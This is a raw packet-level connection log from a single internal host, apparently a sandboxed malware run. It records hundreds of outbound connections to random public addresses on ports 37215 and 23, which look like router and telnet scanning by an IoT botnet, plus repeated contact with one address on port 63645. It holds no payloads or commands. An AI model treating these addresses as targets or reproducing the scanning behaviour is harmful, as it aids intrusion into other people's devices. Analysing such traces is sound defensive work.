                                                Feb 12, 2025 16:56:57.740791082 CET2458237215192.168.2.23157.74.117.239
                                                Feb 12, 2025 16:56:57.740791082 CET2458237215192.168.2.23157.122.171.247
                                                Feb 12, 2025 16:56:57.740791082 CET2458237215192.168.2.2341.218.121.168
                                                Feb 12, 2025 16:56:57.740797043 CET2458237215192.168.2.2341.165.31.177
                                                Feb 12, 2025 16:56:57.740803957 CET2458237215192.168.2.2394.222.254.126
                                                Feb 12, 2025 16:56:57.740807056 CET2458237215192.168.2.2336.57.13.183
                                                Feb 12, 2025 16:56:57.740817070 CET2458237215192.168.2.23157.6.178.91
                                                Feb 12, 2025 16:56:57.740817070 CET2458237215192.168.2.2359.197.130.61
                                                Feb 12, 2025 16:56:57.740824938 CET2458237215192.168.2.2341.156.113.182
                                                Feb 12, 2025 16:56:57.740828037 CET2458237215192.168.2.23186.105.33.174
                                                Feb 12, 2025 16:56:57.740833044 CET2458237215192.168.2.23197.249.247.237
                                                Feb 12, 2025 16:56:57.740833044 CET2458237215192.168.2.23197.205.69.34
                                                Feb 12, 2025 16:56:57.740835905 CET2458237215192.168.2.23102.163.8.199
                                                Feb 12, 2025 16:56:57.740845919 CET2458237215192.168.2.23157.42.209.106
                                                Feb 12, 2025 16:56:57.740849972 CET2458237215192.168.2.23157.61.253.0
                                                Feb 12, 2025 16:56:57.740854025 CET2458237215192.168.2.23197.121.124.15
                                                Feb 12, 2025 16:56:57.740855932 CET2458237215192.168.2.23130.163.43.123
                                                Feb 12, 2025 16:56:57.740873098 CET232407037.212.49.194192.168.2.23
                                                Feb 12, 2025 16:56:57.740875006 CET2458237215192.168.2.23157.133.128.236
                                                Feb 12, 2025 16:56:57.740884066 CET2324070152.11.133.167192.168.2.23
                                                Feb 12, 2025 16:56:57.740890980 CET2458237215192.168.2.2341.144.164.87
                                                Feb 12, 2025 16:56:57.740894079 CET232407062.0.130.87192.168.2.23
                                                Feb 12, 2025 16:56:57.740900040 CET2407023192.168.2.2337.212.49.194
                                                Feb 12, 2025 16:56:57.740901947 CET2458237215192.168.2.23182.158.131.35
                                                Feb 12, 2025 16:56:57.740901947 CET2458237215192.168.2.23197.31.155.223
                                                Feb 12, 2025 16:56:57.740905046 CET232407084.37.173.167192.168.2.23
                                                Feb 12, 2025 16:56:57.740910053 CET2407023192.168.2.23152.11.133.167
                                                Feb 12, 2025 16:56:57.740911961 CET2458237215192.168.2.2341.142.52.60
                                                Feb 12, 2025 16:56:57.740911961 CET2458237215192.168.2.23197.115.46.68
                                                Feb 12, 2025 16:56:57.740916014 CET2407023192.168.2.2362.0.130.87
                                                Feb 12, 2025 16:56:57.740917921 CET2458237215192.168.2.23157.86.197.174
                                                Feb 12, 2025 16:56:57.740919113 CET2324070154.47.101.248192.168.2.23
                                                Feb 12, 2025 16:56:57.740921974 CET2458237215192.168.2.2377.236.43.53
                                                Feb 12, 2025 16:56:57.740925074 CET2324070115.126.124.110192.168.2.23
                                                Feb 12, 2025 16:56:57.740932941 CET2458237215192.168.2.23197.167.175.11
                                                Feb 12, 2025 16:56:57.740936995 CET2324070101.247.0.41192.168.2.23
                                                Feb 12, 2025 16:56:57.740943909 CET2407023192.168.2.2384.37.173.167
                                                Feb 12, 2025 16:56:57.740951061 CET2407023192.168.2.23154.47.101.248
                                                Feb 12, 2025 16:56:57.740958929 CET2407023192.168.2.23115.126.124.110
                                                Feb 12, 2025 16:56:57.740981102 CET2458237215192.168.2.23197.124.20.231
                                                Feb 12, 2025 16:56:57.740981102 CET2458237215192.168.2.23138.124.166.192
                                                Feb 12, 2025 16:56:57.740983009 CET2407023192.168.2.23101.247.0.41
                                                Feb 12, 2025 16:56:57.740991116 CET232407032.13.149.146192.168.2.23
                                                Feb 12, 2025 16:56:57.740995884 CET2458237215192.168.2.23197.129.142.215
                                                Feb 12, 2025 16:56:57.740998030 CET2458237215192.168.2.2341.235.131.216
                                                Feb 12, 2025 16:56:57.741002083 CET2458237215192.168.2.23197.153.174.133
                                                Feb 12, 2025 16:56:57.741002083 CET2458237215192.168.2.23197.63.129.185
                                                Feb 12, 2025 16:56:57.741004944 CET2458237215192.168.2.23197.152.5.216
                                                Feb 12, 2025 16:56:57.741009951 CET2324070164.83.36.18192.168.2.23
                                                Feb 12, 2025 16:56:57.741009951 CET2458237215192.168.2.2341.197.182.82
                                                Feb 12, 2025 16:56:57.741017103 CET232324070113.104.31.190192.168.2.23
                                                Feb 12, 2025 16:56:57.741023064 CET232407058.56.45.236192.168.2.23
                                                Feb 12, 2025 16:56:57.741025925 CET2458237215192.168.2.23151.131.255.47
                                                Feb 12, 2025 16:56:57.741028070 CET232407069.35.70.13192.168.2.23
                                                Feb 12, 2025 16:56:57.741034031 CET2458237215192.168.2.23197.94.118.184
                                                Feb 12, 2025 16:56:57.741034985 CET232324070175.69.177.136192.168.2.23
                                                Feb 12, 2025 16:56:57.741039991 CET2324070220.254.57.129192.168.2.23
                                                Feb 12, 2025 16:56:57.741041899 CET2324070121.114.84.210192.168.2.23
                                                Feb 12, 2025 16:56:57.741044044 CET2458237215192.168.2.2341.226.4.60
                                                Feb 12, 2025 16:56:57.741044044 CET2458237215192.168.2.23157.0.162.16
                                                Feb 12, 2025 16:56:57.741044044 CET2407023192.168.2.2332.13.149.146
                                                Feb 12, 2025 16:56:57.741046906 CET2407023192.168.2.23164.83.36.18
                                                Feb 12, 2025 16:56:57.741054058 CET2407023192.168.2.2358.56.45.236
                                                Feb 12, 2025 16:56:57.741055012 CET240702323192.168.2.23113.104.31.190
                                                Feb 12, 2025 16:56:57.741061926 CET2458237215192.168.2.23184.149.220.48
                                                Feb 12, 2025 16:56:57.741065025 CET2407023192.168.2.2369.35.70.13
                                                Feb 12, 2025 16:56:57.741065025 CET2458237215192.168.2.23201.151.252.65
                                                Feb 12, 2025 16:56:57.741071939 CET240702323192.168.2.23175.69.177.136
                                                Feb 12, 2025 16:56:57.741072893 CET2407023192.168.2.23121.114.84.210
                                                Feb 12, 2025 16:56:57.741082907 CET2407023192.168.2.23220.254.57.129
                                                Feb 12, 2025 16:56:57.741086006 CET2458237215192.168.2.23197.131.104.150
                                                Feb 12, 2025 16:56:57.741090059 CET2458237215192.168.2.23197.89.100.75
                                                Feb 12, 2025 16:56:57.741094112 CET2458237215192.168.2.23197.18.52.168
                                                Feb 12, 2025 16:56:57.741099119 CET2458237215192.168.2.2341.13.128.136
                                                Feb 12, 2025 16:56:57.741099119 CET2458237215192.168.2.23197.168.49.153
                                                Feb 12, 2025 16:56:57.741101980 CET2458237215192.168.2.23197.186.131.227
                                                Feb 12, 2025 16:56:57.741106033 CET2458237215192.168.2.2319.179.233.141
                                                Feb 12, 2025 16:56:57.741111040 CET2458237215192.168.2.23116.95.31.124
                                                Feb 12, 2025 16:56:57.741116047 CET2458237215192.168.2.2341.153.152.240
                                                Feb 12, 2025 16:56:57.741123915 CET2458237215192.168.2.2341.246.152.88
                                                Feb 12, 2025 16:56:57.741127014 CET2458237215192.168.2.2341.50.228.215
                                                Feb 12, 2025 16:56:57.741132021 CET2458237215192.168.2.2334.79.181.217
                                                Feb 12, 2025 16:56:57.741132975 CET2458237215192.168.2.23157.6.113.140
                                                Feb 12, 2025 16:56:57.741141081 CET2458237215192.168.2.2341.77.24.174
                                                Feb 12, 2025 16:56:57.741142035 CET2458237215192.168.2.23221.93.237.99
                                                Feb 12, 2025 16:56:57.741141081 CET2458237215192.168.2.23197.11.82.166
                                                Feb 12, 2025 16:56:57.741168976 CET2458237215192.168.2.23197.38.185.194
                                                Feb 12, 2025 16:56:57.741168976 CET2458237215192.168.2.23216.157.115.64
                                                Feb 12, 2025 16:56:57.741173029 CET2324070187.115.221.84192.168.2.23
                                                Feb 12, 2025 16:56:57.741178036 CET2458237215192.168.2.23197.9.149.148
                                                Feb 12, 2025 16:56:57.741178036 CET2458237215192.168.2.23157.179.234.39
                                                Feb 12, 2025 16:56:57.741178036 CET2458237215192.168.2.23157.249.68.225
                                                Feb 12, 2025 16:56:57.741185904 CET2458237215192.168.2.23197.121.176.222
                                                Feb 12, 2025 16:56:57.741185904 CET2324070126.185.106.238192.168.2.23
                                                Feb 12, 2025 16:56:57.741197109 CET2458237215192.168.2.23197.255.41.29
                                                Feb 12, 2025 16:56:57.741199017 CET2458237215192.168.2.23157.128.225.222
                                                Feb 12, 2025 16:56:57.741199970 CET23240708.254.10.88192.168.2.23
                                                Feb 12, 2025 16:56:57.741213083 CET2324070174.230.188.24192.168.2.23
                                                Feb 12, 2025 16:56:57.741226912 CET2458237215192.168.2.2341.242.140.44
                                                Feb 12, 2025 16:56:57.741228104 CET23232407085.36.163.7192.168.2.23
                                                Feb 12, 2025 16:56:57.741230011 CET232407079.36.196.133192.168.2.23
                                                Feb 12, 2025 16:56:57.741231918 CET2324070152.41.63.174192.168.2.23
                                                Feb 12, 2025 16:56:57.741235971 CET2458237215192.168.2.23181.22.21.131
                                                Feb 12, 2025 16:56:57.741235971 CET2458237215192.168.2.2341.72.107.150
                                                Feb 12, 2025 16:56:57.741239071 CET2458237215192.168.2.23197.195.59.237
                                                Feb 12, 2025 16:56:57.741240025 CET2458237215192.168.2.23157.96.102.109
                                                Feb 12, 2025 16:56:57.741251945 CET2458237215192.168.2.23197.196.212.101
                                                Feb 12, 2025 16:56:57.741254091 CET2458237215192.168.2.23197.209.56.158
                                                Feb 12, 2025 16:56:57.741254091 CET2458237215192.168.2.23197.27.86.26
                                                Feb 12, 2025 16:56:57.741255999 CET2458237215192.168.2.23157.131.151.79
                                                Feb 12, 2025 16:56:57.741255999 CET2407023192.168.2.23126.185.106.238
                                                Feb 12, 2025 16:56:57.741256952 CET2458237215192.168.2.2341.85.157.143
                                                Feb 12, 2025 16:56:57.741260052 CET2458237215192.168.2.23197.233.121.175
                                                Feb 12, 2025 16:56:57.741260052 CET2458237215192.168.2.23157.1.22.69
                                                Feb 12, 2025 16:56:57.741260052 CET2407023192.168.2.238.254.10.88
                                                Feb 12, 2025 16:56:57.741260052 CET2458237215192.168.2.23157.1.176.165
                                                Feb 12, 2025 16:56:57.741261959 CET2407023192.168.2.23187.115.221.84
                                                Feb 12, 2025 16:56:57.741261959 CET2458237215192.168.2.2341.103.92.181
                                                Feb 12, 2025 16:56:57.741261959 CET2458237215192.168.2.23124.15.31.250
                                                Feb 12, 2025 16:56:57.741261959 CET2458237215192.168.2.23157.112.116.96
                                                Feb 12, 2025 16:56:57.741261959 CET2407023192.168.2.23174.230.188.24
                                                Feb 12, 2025 16:56:57.741261959 CET2458237215192.168.2.23157.203.128.170
                                                Feb 12, 2025 16:56:57.741261959 CET2458237215192.168.2.2341.38.194.187
                                                Feb 12, 2025 16:56:57.741261959 CET2458237215192.168.2.23197.150.0.153
                                                Feb 12, 2025 16:56:57.741271973 CET2458237215192.168.2.2341.170.190.52
                                                Feb 12, 2025 16:56:57.741271973 CET2407023192.168.2.2379.36.196.133
                                                Feb 12, 2025 16:56:57.741276026 CET240702323192.168.2.2385.36.163.7
                                                Feb 12, 2025 16:56:57.741276979 CET2458237215192.168.2.23169.219.149.56
                                                Feb 12, 2025 16:56:57.741278887 CET2458237215192.168.2.23157.248.71.246
                                                Feb 12, 2025 16:56:57.741281986 CET2458237215192.168.2.23197.89.161.132
                                                Feb 12, 2025 16:56:57.741281986 CET2458237215192.168.2.23197.25.248.247
                                                Feb 12, 2025 16:56:57.741286039 CET2324070142.42.55.107192.168.2.23
                                                Feb 12, 2025 16:56:57.741295099 CET2458237215192.168.2.23197.71.92.38
                                                Feb 12, 2025 16:56:57.741297007 CET2324070183.166.178.162192.168.2.23
                                                Feb 12, 2025 16:56:57.741302967 CET2458237215192.168.2.2341.49.55.41
                                                Feb 12, 2025 16:56:57.741302967 CET2458237215192.168.2.2341.246.91.247
                                                Feb 12, 2025 16:56:57.741306067 CET2324070177.203.138.237192.168.2.23
                                                Feb 12, 2025 16:56:57.741307020 CET2407023192.168.2.23152.41.63.174
                                                Feb 12, 2025 16:56:57.741307020 CET2458237215192.168.2.23157.244.246.101
                                                Feb 12, 2025 16:56:57.741312027 CET2324070110.94.222.182192.168.2.23
                                                Feb 12, 2025 16:56:57.741322994 CET2458237215192.168.2.23159.134.230.110
                                                Feb 12, 2025 16:56:57.741326094 CET2458237215192.168.2.23197.55.134.221
                                                Feb 12, 2025 16:56:57.741328001 CET2407023192.168.2.23142.42.55.107
                                                Feb 12, 2025 16:56:57.741326094 CET2407023192.168.2.23183.166.178.162
                                                Feb 12, 2025 16:56:57.741341114 CET2324070195.181.138.60192.168.2.23
                                                Feb 12, 2025 16:56:57.741350889 CET232407068.102.82.48192.168.2.23
                                                Feb 12, 2025 16:56:57.741353989 CET2458237215192.168.2.23197.91.105.222
                                                Feb 12, 2025 16:56:57.741364002 CET2407023192.168.2.23195.181.138.60
                                                Feb 12, 2025 16:56:57.741370916 CET2407023192.168.2.23110.94.222.182
                                                Feb 12, 2025 16:56:57.741372108 CET2407023192.168.2.23177.203.138.237
                                                Feb 12, 2025 16:56:57.741372108 CET2458237215192.168.2.23197.210.23.150
                                                Feb 12, 2025 16:56:57.741381884 CET2458237215192.168.2.2380.84.87.191
                                                Feb 12, 2025 16:56:57.741383076 CET232407085.154.19.154192.168.2.23
                                                Feb 12, 2025 16:56:57.741385937 CET2407023192.168.2.2368.102.82.48
                                                Feb 12, 2025 16:56:57.741385937 CET2458237215192.168.2.2341.46.79.244
                                                Feb 12, 2025 16:56:57.741394043 CET232407038.169.210.230192.168.2.23
                                                Feb 12, 2025 16:56:57.741395950 CET2458237215192.168.2.23157.71.138.14
                                                Feb 12, 2025 16:56:57.741405010 CET2324070175.156.58.80192.168.2.23
                                                Feb 12, 2025 16:56:57.741409063 CET2458237215192.168.2.23157.8.228.71
                                                Feb 12, 2025 16:56:57.741409063 CET2458237215192.168.2.23157.162.130.184
                                                Feb 12, 2025 16:56:57.741411924 CET2458237215192.168.2.23157.238.131.146
                                                Feb 12, 2025 16:56:57.741414070 CET2458237215192.168.2.2341.109.69.68
                                                Feb 12, 2025 16:56:57.741415024 CET2324070102.215.117.227192.168.2.23
                                                Feb 12, 2025 16:56:57.741419077 CET2407023192.168.2.2385.154.19.154
                                                Feb 12, 2025 16:56:57.741424084 CET232407071.121.236.245192.168.2.23
                                                Feb 12, 2025 16:56:57.741426945 CET2407023192.168.2.2338.169.210.230
                                                Feb 12, 2025 16:56:57.741430044 CET2458237215192.168.2.23197.8.64.183
                                                Feb 12, 2025 16:56:57.741432905 CET2458237215192.168.2.23157.48.41.143
                                                Feb 12, 2025 16:56:57.741435051 CET2458237215192.168.2.23157.162.88.59
                                                Feb 12, 2025 16:56:57.741435051 CET2458237215192.168.2.23157.127.121.12
                                                Feb 12, 2025 16:56:57.741441965 CET232407027.21.181.204192.168.2.23
                                                Feb 12, 2025 16:56:57.741449118 CET2458237215192.168.2.23182.34.125.184
                                                Feb 12, 2025 16:56:57.741451979 CET2458237215192.168.2.2325.200.109.29
                                                Feb 12, 2025 16:56:57.741451979 CET2458237215192.168.2.23197.75.127.252
                                                Feb 12, 2025 16:56:57.741452932 CET232407096.74.230.249192.168.2.23
                                                Feb 12, 2025 16:56:57.741453886 CET2407023192.168.2.23175.156.58.80
                                                Feb 12, 2025 16:56:57.741453886 CET2407023192.168.2.23102.215.117.227
                                                Feb 12, 2025 16:56:57.741456985 CET2458237215192.168.2.23157.221.240.117
                                                Feb 12, 2025 16:56:57.741456985 CET2458237215192.168.2.2341.9.47.212
                                                Feb 12, 2025 16:56:57.741462946 CET232324070104.195.16.58192.168.2.23
                                                Feb 12, 2025 16:56:57.741465092 CET2458237215192.168.2.2388.240.44.99
                                                Feb 12, 2025 16:56:57.741461039 CET2458237215192.168.2.23157.148.40.60
                                                Feb 12, 2025 16:56:57.741461039 CET2458237215192.168.2.23169.39.43.63
                                                Feb 12, 2025 16:56:57.741470098 CET2458237215192.168.2.2341.223.37.82
                                                Feb 12, 2025 16:56:57.741470098 CET2458237215192.168.2.2341.231.11.22
                                                Feb 12, 2025 16:56:57.741470098 CET2458237215192.168.2.2318.56.102.241
                                                Feb 12, 2025 16:56:57.741471052 CET2458237215192.168.2.2341.196.120.162
                                                Feb 12, 2025 16:56:57.741472960 CET2458237215192.168.2.23197.152.2.253
                                                Feb 12, 2025 16:56:57.741473913 CET232407045.1.4.155192.168.2.23
                                                Feb 12, 2025 16:56:57.741477013 CET2458237215192.168.2.23157.135.210.107
                                                Feb 12, 2025 16:56:57.741477013 CET2407023192.168.2.2327.21.181.204
                                                Feb 12, 2025 16:56:57.741477966 CET2407023192.168.2.2371.121.236.245
                                                Feb 12, 2025 16:56:57.741478920 CET2324070111.76.152.40192.168.2.23
                                                Feb 12, 2025 16:56:57.741482973 CET232407096.72.63.81192.168.2.23
                                                Feb 12, 2025 16:56:57.741483927 CET2407023192.168.2.2396.74.230.249
                                                Feb 12, 2025 16:56:57.741487026 CET2458237215192.168.2.23197.48.128.226
                                                Feb 12, 2025 16:56:57.741492987 CET2324070143.22.19.183192.168.2.23
                                                Feb 12, 2025 16:56:57.741493940 CET2458237215192.168.2.2379.145.19.60
                                                Feb 12, 2025 16:56:57.741498947 CET2458237215192.168.2.2341.1.105.146
                                                Feb 12, 2025 16:56:57.741501093 CET2458237215192.168.2.23157.27.181.219
                                                Feb 12, 2025 16:56:57.741503954 CET2324070152.131.251.91192.168.2.23
                                                Feb 12, 2025 16:56:57.741517067 CET2407023192.168.2.2396.72.63.81
                                                Feb 12, 2025 16:56:57.741517067 CET2407023192.168.2.2345.1.4.155
                                                Feb 12, 2025 16:56:57.741522074 CET2458237215192.168.2.2363.12.19.72
                                                Feb 12, 2025 16:56:57.741522074 CET2407023192.168.2.23111.76.152.40
                                                Feb 12, 2025 16:56:57.741522074 CET2407023192.168.2.23143.22.19.183
                                                Feb 12, 2025 16:56:57.741535902 CET2458237215192.168.2.2341.254.240.72
                                                Feb 12, 2025 16:56:57.741537094 CET2458237215192.168.2.2338.60.72.179
                                                Feb 12, 2025 16:56:57.741539001 CET2407023192.168.2.23152.131.251.91
                                                Feb 12, 2025 16:56:57.741539001 CET2458237215192.168.2.2341.126.58.231
                                                Feb 12, 2025 16:56:57.741542101 CET2324070167.82.180.191192.168.2.23
                                                Feb 12, 2025 16:56:57.741552114 CET232324070198.46.230.68192.168.2.23
                                                Feb 12, 2025 16:56:57.741555929 CET240702323192.168.2.23104.195.16.58
                                                Feb 12, 2025 16:56:57.741555929 CET2458237215192.168.2.23197.90.181.197
                                                Feb 12, 2025 16:56:57.741565943 CET23240705.121.182.225192.168.2.23
                                                Feb 12, 2025 16:56:57.741565943 CET2458237215192.168.2.2341.34.90.232
                                                Feb 12, 2025 16:56:57.741570950 CET232407041.157.221.218192.168.2.23
                                                Feb 12, 2025 16:56:57.741574049 CET2458237215192.168.2.2341.213.38.225
                                                Feb 12, 2025 16:56:57.741575003 CET2407023192.168.2.23167.82.180.191
                                                Feb 12, 2025 16:56:57.741578102 CET2458237215192.168.2.2341.64.118.151
                                                Feb 12, 2025 16:56:57.741578102 CET2458237215192.168.2.23166.0.9.99
                                                Feb 12, 2025 16:56:57.741579056 CET232407014.190.163.43192.168.2.23
                                                Feb 12, 2025 16:56:57.741585970 CET2324070187.219.208.110192.168.2.23
                                                Feb 12, 2025 16:56:57.741586924 CET2324070154.28.56.244192.168.2.23
                                                Feb 12, 2025 16:56:57.741589069 CET2324070130.1.19.95192.168.2.23
                                                Feb 12, 2025 16:56:57.741590023 CET2324070119.118.173.186192.168.2.23
                                                Feb 12, 2025 16:56:57.741590977 CET240702323192.168.2.23198.46.230.68
                                                Feb 12, 2025 16:56:57.741591930 CET2324070146.169.75.99192.168.2.23
                                                Feb 12, 2025 16:56:57.741592884 CET2407023192.168.2.235.121.182.225
                                                Feb 12, 2025 16:56:57.741592884 CET2458237215192.168.2.23157.35.94.209
                                                Feb 12, 2025 16:56:57.741596937 CET2324070194.74.224.140192.168.2.23
                                                Feb 12, 2025 16:56:57.741597891 CET2407023192.168.2.2341.157.221.218
                                                Feb 12, 2025 16:56:57.741602898 CET2324070223.17.45.123192.168.2.23
                                                Feb 12, 2025 16:56:57.741611004 CET2407023192.168.2.2314.190.163.43
                                                Feb 12, 2025 16:56:57.741612911 CET232407085.80.175.35192.168.2.23
                                                Feb 12, 2025 16:56:57.741616011 CET2407023192.168.2.23187.219.208.110
                                                Feb 12, 2025 16:56:57.741617918 CET2407023192.168.2.23154.28.56.244
                                                Feb 12, 2025 16:56:57.741626024 CET232407097.117.232.60192.168.2.23
                                                Feb 12, 2025 16:56:57.741627932 CET2407023192.168.2.23130.1.19.95
                                                Feb 12, 2025 16:56:57.741627932 CET2407023192.168.2.23194.74.224.140
                                                Feb 12, 2025 16:56:57.741632938 CET2407023192.168.2.23119.118.173.186
                                                Feb 12, 2025 16:56:57.741636992 CET232407044.151.6.32192.168.2.23
                                                Feb 12, 2025 16:56:57.741637945 CET2407023192.168.2.23146.169.75.99
                                                Feb 12, 2025 16:56:57.741637945 CET2407023192.168.2.23223.17.45.123
                                                Feb 12, 2025 16:56:57.741647005 CET232407099.184.119.246192.168.2.23
                                                Feb 12, 2025 16:56:57.741648912 CET2407023192.168.2.2385.80.175.35
                                                Feb 12, 2025 16:56:57.741657019 CET23232407046.247.54.200192.168.2.23
                                                Feb 12, 2025 16:56:57.741657019 CET2407023192.168.2.2397.117.232.60
                                                Feb 12, 2025 16:56:57.741668940 CET2407023192.168.2.2344.151.6.32
                                                Feb 12, 2025 16:56:57.741668940 CET2458237215192.168.2.23157.255.52.96
                                                Feb 12, 2025 16:56:57.741672993 CET232407082.142.68.101192.168.2.23
                                                Feb 12, 2025 16:56:57.741676092 CET2324070107.127.91.57192.168.2.23
                                                Feb 12, 2025 16:56:57.741684914 CET2458237215192.168.2.2341.26.203.246
                                                Feb 12, 2025 16:56:57.741684914 CET2458237215192.168.2.23197.72.222.192
                                                Feb 12, 2025 16:56:57.741688013 CET2407023192.168.2.2399.184.119.246
                                                Feb 12, 2025 16:56:57.741688013 CET240702323192.168.2.2346.247.54.200
                                                Feb 12, 2025 16:56:57.741691113 CET2458237215192.168.2.2367.166.248.79
                                                Feb 12, 2025 16:56:57.741692066 CET2458237215192.168.2.2341.149.118.32
                                                Feb 12, 2025 16:56:57.741705894 CET2407023192.168.2.23107.127.91.57
                                                Feb 12, 2025 16:56:57.741705894 CET2407023192.168.2.2382.142.68.101
                                                Feb 12, 2025 16:56:57.741709948 CET2324070196.186.139.235192.168.2.23
                                                Feb 12, 2025 16:56:57.741719961 CET232407069.219.246.35192.168.2.23
                                                Feb 12, 2025 16:56:57.741724968 CET2458237215192.168.2.23124.229.54.106
                                                Feb 12, 2025 16:56:57.741728067 CET2458237215192.168.2.23157.0.0.71
                                                Feb 12, 2025 16:56:57.741729021 CET23232407091.85.45.98192.168.2.23
                                                Feb 12, 2025 16:56:57.741734028 CET2458237215192.168.2.23196.169.174.4
                                                Feb 12, 2025 16:56:57.741739988 CET2324070138.215.59.33192.168.2.23
                                                Feb 12, 2025 16:56:57.741741896 CET2458237215192.168.2.2341.93.165.28
                                                Feb 12, 2025 16:56:57.741741896 CET2407023192.168.2.23196.186.139.235
                                                Feb 12, 2025 16:56:57.741741896 CET2458237215192.168.2.23197.219.86.33
                                                Feb 12, 2025 16:56:57.741743088 CET2407023192.168.2.2369.219.246.35
                                                Feb 12, 2025 16:56:57.741743088 CET2458237215192.168.2.2354.134.35.81
                                                Feb 12, 2025 16:56:57.741753101 CET232407097.96.184.212192.168.2.23
                                                Feb 12, 2025 16:56:57.741755009 CET2458237215192.168.2.2325.201.194.114
                                                Feb 12, 2025 16:56:57.741755009 CET2458237215192.168.2.23197.126.81.47
                                                Feb 12, 2025 16:56:57.741756916 CET2458237215192.168.2.23157.217.124.46
                                                Feb 12, 2025 16:56:57.741756916 CET240702323192.168.2.2391.85.45.98
                                                Feb 12, 2025 16:56:57.741760969 CET2458237215192.168.2.23197.108.163.57
                                                Feb 12, 2025 16:56:57.741764069 CET2324070193.45.116.215192.168.2.23
                                                Feb 12, 2025 16:56:57.741770983 CET2458237215192.168.2.2341.26.170.106
                                                Feb 12, 2025 16:56:57.741775990 CET2458237215192.168.2.23121.1.89.2
                                                Feb 12, 2025 16:56:57.741775990 CET2407023192.168.2.23138.215.59.33
                                                Feb 12, 2025 16:56:57.741777897 CET2458237215192.168.2.23197.202.128.143
                                                Feb 12, 2025 16:56:57.741777897 CET2324070209.195.244.167192.168.2.23
                                                Feb 12, 2025 16:56:57.741777897 CET2458237215192.168.2.23157.87.218.37
                                                Feb 12, 2025 16:56:57.741780043 CET2324070212.210.8.182192.168.2.23
                                                Feb 12, 2025 16:56:57.741784096 CET2324070207.26.93.194192.168.2.23
                                                Feb 12, 2025 16:56:57.741785049 CET2458237215192.168.2.2341.28.223.230
                                                Feb 12, 2025 16:56:57.741786957 CET2407023192.168.2.2397.96.184.212
                                                Feb 12, 2025 16:56:57.741789103 CET2458237215192.168.2.2341.27.24.146
                                                Feb 12, 2025 16:56:57.741789103 CET2458237215192.168.2.23197.109.58.91
                                                Feb 12, 2025 16:56:57.741789103 CET2407023192.168.2.23193.45.116.215
                                                Feb 12, 2025 16:56:57.741794109 CET2324070158.138.117.7192.168.2.23
                                                Feb 12, 2025 16:56:57.741796970 CET2407023192.168.2.23209.195.244.167
                                                Feb 12, 2025 16:56:57.741799116 CET2458237215192.168.2.2341.132.198.214
                                                Feb 12, 2025 16:56:57.741800070 CET2458237215192.168.2.2341.217.182.245
                                                Feb 12, 2025 16:56:57.741803885 CET2324070213.113.193.136192.168.2.23
                                                Feb 12, 2025 16:56:57.741806030 CET2407023192.168.2.23207.26.93.194
                                                Feb 12, 2025 16:56:57.741806984 CET2407023192.168.2.23212.210.8.182
                                                Feb 12, 2025 16:56:57.741812944 CET2324070212.105.90.5192.168.2.23
                                                Feb 12, 2025 16:56:57.741832018 CET2407023192.168.2.23213.113.193.136
                                                Feb 12, 2025 16:56:57.741853952 CET2407023192.168.2.23158.138.117.7
                                                Feb 12, 2025 16:56:57.741885900 CET2458237215192.168.2.2399.137.27.100
                                                Feb 12, 2025 16:56:57.741885900 CET2458237215192.168.2.2370.49.138.209
                                                Feb 12, 2025 16:56:57.741885900 CET2458237215192.168.2.23157.189.150.52
                                                Feb 12, 2025 16:56:57.741888046 CET2407023192.168.2.23212.105.90.5
                                                Feb 12, 2025 16:56:57.741888046 CET2458237215192.168.2.23210.131.37.36
                                                Feb 12, 2025 16:56:57.741889000 CET2458237215192.168.2.23157.37.80.145
                                                Feb 12, 2025 16:56:57.741897106 CET2458237215192.168.2.2341.161.230.195
                                                Feb 12, 2025 16:56:57.741897106 CET2458237215192.168.2.2364.112.0.88
                                                Feb 12, 2025 16:56:57.741899014 CET2458237215192.168.2.2341.102.16.57
                                                Feb 12, 2025 16:56:57.741908073 CET2458237215192.168.2.2341.25.54.63
                                                Feb 12, 2025 16:56:57.741908073 CET2458237215192.168.2.23157.52.127.202
                                                Feb 12, 2025 16:56:57.741909027 CET2458237215192.168.2.23143.0.189.10
                                                Feb 12, 2025 16:56:57.741908073 CET2458237215192.168.2.23197.47.46.203
                                                Feb 12, 2025 16:56:57.741909027 CET2458237215192.168.2.23197.240.86.17
                                                Feb 12, 2025 16:56:57.741916895 CET2458237215192.168.2.23157.243.232.28
                                                Feb 12, 2025 16:56:57.746068954 CET636455113645.149.241.90192.168.2.23
                                                Feb 12, 2025 16:56:57.746113062 CET5113663645192.168.2.2345.149.241.90
                                                Feb 12, 2025 16:56:57.746144056 CET5113663645192.168.2.2345.149.241.90
                                                Feb 12, 2025 16:56:57.746200085 CET3721524582197.51.43.80192.168.2.23
                                                Feb 12, 2025 16:56:57.746216059 CET3721524582197.141.157.80192.168.2.23
                                                Feb 12, 2025 16:56:57.746254921 CET2458237215192.168.2.23197.51.43.80
                                                Feb 12, 2025 16:56:57.746323109 CET2458237215192.168.2.23197.141.157.80
                                                Feb 12, 2025 16:56:57.746337891 CET3721524582157.190.149.199192.168.2.23
                                                Feb 12, 2025 16:56:57.746351004 CET3721524582168.53.71.52192.168.2.23
                                                Feb 12, 2025 16:56:57.746361017 CET372152458241.114.175.109192.168.2.23
                                                Feb 12, 2025 16:56:57.746372938 CET3721524582197.119.171.199192.168.2.23
                                                Feb 12, 2025 16:56:57.746381998 CET2458237215192.168.2.23157.190.149.199
                                                Feb 12, 2025 16:56:57.746381998 CET2458237215192.168.2.23168.53.71.52
                                                Feb 12, 2025 16:56:57.746383905 CET3721524582157.34.117.25192.168.2.23
                                                Feb 12, 2025 16:56:57.746392965 CET2458237215192.168.2.2341.114.175.109
                                                Feb 12, 2025 16:56:57.746396065 CET372152458241.128.25.192192.168.2.23
                                                Feb 12, 2025 16:56:57.746402979 CET2458237215192.168.2.23197.119.171.199
                                                Feb 12, 2025 16:56:57.746407032 CET372152458241.161.194.85192.168.2.23
                                                Feb 12, 2025 16:56:57.746417046 CET2458237215192.168.2.23157.34.117.25
                                                Feb 12, 2025 16:56:57.746431112 CET3721524582157.193.56.121192.168.2.23
                                                Feb 12, 2025 16:56:57.746433020 CET2458237215192.168.2.2341.128.25.192
                                                Feb 12, 2025 16:56:57.746436119 CET2458237215192.168.2.2341.161.194.85
                                                Feb 12, 2025 16:56:57.746442080 CET372152458241.60.239.50192.168.2.23
                                                Feb 12, 2025 16:56:57.746454000 CET3721524582197.170.133.38192.168.2.23
                                                Feb 12, 2025 16:56:57.746459007 CET2458237215192.168.2.23157.193.56.121
                                                Feb 12, 2025 16:56:57.746465921 CET3721524582157.118.125.243192.168.2.23
                                                Feb 12, 2025 16:56:57.746475935 CET3721524582143.71.206.242192.168.2.23
